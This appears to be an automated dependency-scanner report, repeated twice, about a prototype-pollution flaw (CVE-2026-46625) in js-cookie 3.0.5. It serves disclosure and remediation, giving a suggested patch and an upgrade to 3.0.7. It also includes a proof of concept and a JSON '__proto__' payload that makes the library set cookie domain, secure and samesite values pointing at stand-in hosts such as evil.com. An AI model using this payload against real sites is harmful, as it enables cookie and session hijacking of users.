Vulnerable Library - react-cookie-consent-10.0.1.tgz
Path to dependency file: /package.json
Path to vulnerable library: /home/wss-scanner/.yarn/berry/cache/js-cookie-npm-3.0.5-8fc8fcc9b4-10c0.zip
Found in HEAD commit: da0c9c84fdbc82b3b8e2221482a86225136e26be
Vulnerabilities
| Vulnerability |
Severity |
 CVSS |
Dependency |
Type |
Fixed in (react-cookie-consent version) |
Remediation Possible** |
| CVE-2026-46625 |
 High |
7.5 |
js-cookie-3.0.5.tgz |
Transitive |
N/A* |
❌ |
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-46625
Vulnerable Library - js-cookie-3.0.5.tgz
Library home page: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz
Path to dependency file: /package.json
Path to vulnerable library: /home/wss-scanner/.yarn/berry/cache/js-cookie-npm-3.0.5-8fc8fcc9b4-10c0.zip
Dependency Hierarchy:
- react-cookie-consent-10.0.1.tgz (Root Library)
- ❌ js-cookie-3.0.5.tgz (Vulnerable Library)
Found in HEAD commit: da0c9c84fdbc82b3b8e2221482a86225136e26be
Found in base branch: main
Vulnerability Details
Summary "js-cookie"'s internal "assign()" helper copies properties with "for...in" + plain assignment. When the source object is produced by "JSON.parse", the JSON object's ""proto"" member is an own enumerable property, so the "for…in" enumerates it and the "target[key] = source[key]" write triggers the "Object.prototype.proto" setter on the fresh "target" ("{}"). The result is a per-instance prototype hijack: "Object.prototype" itself is untouched, but the merged "attributes" object now inherits attacker-controlled keys. Because the consuming "set()" function then enumerates the merged object with another "for...in", every key the attacker placed on the polluted prototype lands in the resulting "Set-Cookie" string as an attribute pair. The attacker can set "domain=", "secure=", "samesite=", "expires=", and "path=" on cookies whose attributes the developer thought were locked down. Impact Any application that forwards a JSON-derived object as the "attributes" argument to "Cookies.set", "Cookies.remove", "Cookies.withAttributes", or "Cookies.withConverter" is vulnerable. This is the standard pattern when cookie configuration comes from a backend: const cfg = await fetch('/config').then(r => r.json()); Cookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker A payload of "{"proto":{"domain":"evil.example","secure":"false","samesite":"None"}}" causes js-cookie to emit: Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None Affected code // src/assign.mjs — full file export default function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] for (var key in source) { // includes own enumerable 'proto' target[key] = source[key] // [[Set]] form - fires proto setter } } return target } Proof of concept Node 22.11.0, no third-party deps: Environment setup mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc npm init -y npm i js-cookie PoC ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs let lastSetCookie = ''; globalThis.document = { get cookie() { return ''; }, set cookie(v) { lastSetCookie = v; } }; const { default: Cookies } = await import('js-cookie'); const attackerAttrs = JSON.parse( '{"proto":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}' ); Cookies.set('session', 'TOKEN', attackerAttrs); console.log('Set-Cookie that js-cookie wrote to document.cookie:'); console.log(lastSetCookie); Execution: 
Suggested patch --- a/src/assign.mjs +++ b/src/assign.mjs @@ export default function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] - for (var key in source) { - target[key] = source[key] - } + for (var key in source) { + if (key === 'proto' || key === 'constructor' || key === 'prototype') continue + Object.defineProperty(target, key, { + value: source[key], + writable: true, + enumerable: true, + configurable: true, + }) + } } return target } Equivalent one-liner alternative - iterate own names only and filter: for (const key of Object.getOwnPropertyNames(source)) { if (key === 'proto') continue target[key] = source[key] }
Publish Date: 2026-05-21
URL: CVE-2026-46625
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-qjx8-664m-686j
Release Date: 2026-05-21
Fix Resolution: js-cookie - 3.0.7
Step up your Open Source Security Game with Mend here
Path to dependency file: /package.json
Path to vulnerable library: /home/wss-scanner/.yarn/berry/cache/js-cookie-npm-3.0.5-8fc8fcc9b4-10c0.zip
Found in HEAD commit: da0c9c84fdbc82b3b8e2221482a86225136e26be
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - js-cookie-3.0.5.tgz
Library home page: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz
Path to dependency file: /package.json
Path to vulnerable library: /home/wss-scanner/.yarn/berry/cache/js-cookie-npm-3.0.5-8fc8fcc9b4-10c0.zip
Dependency Hierarchy:
Found in HEAD commit: da0c9c84fdbc82b3b8e2221482a86225136e26be
Found in base branch: main
Vulnerability Details
Summary "js-cookie"'s internal "assign()" helper copies properties with "for...in" + plain assignment. When the source object is produced by "JSON.parse", the JSON object's ""proto"" member is an own enumerable property, so the "for…in" enumerates it and the "target[key] = source[key]" write triggers the "Object.prototype.proto" setter on the fresh "target" ("{}"). The result is a per-instance prototype hijack: "Object.prototype" itself is untouched, but the merged "attributes" object now inherits attacker-controlled keys. Because the consuming "set()" function then enumerates the merged object with another "for...in", every key the attacker placed on the polluted prototype lands in the resulting "Set-Cookie" string as an attribute pair. The attacker can set "domain=", "secure=", "samesite=", "expires=", and "path=" on cookies whose attributes the developer thought were locked down. Impact Any application that forwards a JSON-derived object as the "attributes" argument to "Cookies.set", "Cookies.remove", "Cookies.withAttributes", or "Cookies.withConverter" is vulnerable. This is the standard pattern when cookie configuration comes from a backend: const cfg = await fetch('/config').then(r => r.json()); Cookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker A payload of "{"proto":{"domain":"evil.example","secure":"false","samesite":"None"}}" causes js-cookie to emit: Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None Affected code // src/assign.mjs — full file export default function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] for (var key in source) { // includes own enumerable 'proto' target[key] = source[key] // [[Set]] form - fires proto setter } } return target } Proof of concept Node 22.11.0, no third-party deps: Environment setup mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc npm init -y npm i js-cookie PoC ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs let lastSetCookie = ''; globalThis.document = { get cookie() { return ''; }, set cookie(v) { lastSetCookie = v; } }; const { default: Cookies } = await import('js-cookie'); const attackerAttrs = JSON.parse( '{"proto":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}' ); Cookies.set('session', 'TOKEN', attackerAttrs); console.log('Set-Cookie that js-cookie wrote to document.cookie:'); console.log(lastSetCookie); Execution:
Suggested patch --- a/src/assign.mjs +++ b/src/assign.mjs @@ export default function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] - for (var key in source) { - target[key] = source[key] - } + for (var key in source) { + if (key === 'proto' || key === 'constructor' || key === 'prototype') continue + Object.defineProperty(target, key, { + value: source[key], + writable: true, + enumerable: true, + configurable: true, + }) + } } return target } Equivalent one-liner alternative - iterate own names only and filter: for (const key of Object.getOwnPropertyNames(source)) { if (key === 'proto') continue target[key] = source[key] }
Publish Date: 2026-05-21
URL: CVE-2026-46625
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-qjx8-664m-686j
Release Date: 2026-05-21
Fix Resolution: js-cookie - 3.0.7
Step up your Open Source Security Game with Mend here